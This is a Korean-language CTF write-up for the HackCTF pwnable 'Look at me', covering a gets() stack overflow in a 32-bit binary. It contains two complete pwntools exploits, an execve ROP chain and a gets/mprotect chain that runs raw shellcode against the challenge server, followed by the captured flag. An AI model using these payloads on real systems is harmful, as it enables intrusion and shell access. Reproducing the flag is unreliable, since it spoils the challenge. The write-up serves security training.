[HackCTF / pwnable] Look at me

HackCTF - Look at me

Summary

• 32bit

Analysis

main

int __cdecl main(int argc, const char **argv, const char **envp)
{
int v3; // ST1C_4
setvbuf(stdout, 0, 2, 0);
v3 = getegid();
setresgid(v3, v3, v3);
look_at_me();
return 0;
}

look_at_me

int look_at_me()
{
char v1; // [esp+0h] [ebp-18h]
puts("Hellooooooooooooooooooooo");
return gets(&v1);
}

v1에서 버퍼오버플로우가 생긴다.

Exploit

from pwn import *
​
e = ELF("./lookatme")
p = process("./lookatme")
​
movret = 0x080549db # mov dword ptr [edx], eax ; ret
popedx = 0x0806f02a
popeax = 0x080b81c6
popedxecxebx = 0x0806f050
int0x80 = 0x0806cc25
​
p.recvuntil("Hellooooooooooooooooooooo\n")
​
payload = ""
payload += "A"*(0x18+0x4)
​
payload += p32(popedx)
payload += p32(e.symbols["__data_start"])
payload += p32(popeax)
payload += "/bin"
payload += p32(movret)
​
payload += p32(popedx)
payload += p32(e.symbols["__data_start"]+4)
payload += p32(popeax)
payload += "/sh\x00"
payload += p32(movret)
​
payload += p32(popedxecxebx)
payload += p32(0)
payload += p32(0)
payload += p32(e.symbols["__data_start"])
payload += p32(popeax)
payload += p32(11)
payload += p32(int0x80)
​
p.sendline(payload)
p.interactive()

edx에 data 시작주소를 넣어주고 eax에 "/bin"을 넣어준 후에 mov dword ptr [edx], eax ; ret을 하면 data시작주소에 /bin이 들어간다.

다시 edx에 data 시작주소 + 4를 넣고 eax에 "/sh\x00"를 넣어준 후 mov ret을 하면 data시작주소 + 4에 /sh\x00이 들어간다.

그리고 edx, ecx에 0, ebx에 data 시작주소를, eax에 execve syscall을 넣고 int 0x80을 하면 쉘이 뜬다.

from pwn import *
​
e = ELF("./lookatme")
#p = process("./lookatme")
p = remote("ctf.j0n9hyun.xyz", 3017)
​
bss = e.bss() / 0x1000
bss *= 0x1000
pr = 0x080483ca
pppr = 0x080483c8
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"
​
payload = ""
payload += "A"*28
payload += p32(e.symbols["gets"])
payload += p32(pr)
payload += p32(bss)
payload += p32(e.symbols["mprotect"])
payload += p32(pppr)
payload += p32(bss)
payload += p32(0x8000)
payload += p32(0x7)
payload += p32(bss)
​
p.recvuntil("Hellooooooooooooooooooooo\n")
p.sendline(payload)
p.sendline(shellcode)
​
p.interactive()

gets로 bss영역에 쉘코드를 넣어준다.

mprotect로 bss영역에 실행권한을 준 뒤에 쉘코드를 실행시키면 된다.

mprotect를 써서 해도 되지만 위에처럼 syscall을 쓰는것이 좋다.

Flag

cg10036@cg10036-virtual-machine:~/hackCTF/Look_at_me$ p ex.py 
[*] '/home/cg10036/hackCTF/Look_at_me/lookatme'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Opening connection to ctf.j0n9hyun.xyz on port 3017: Done
[*] Switching to interactive mode
$ cat flag
HackCTF{Did_you_understand_the_static_linking_method?}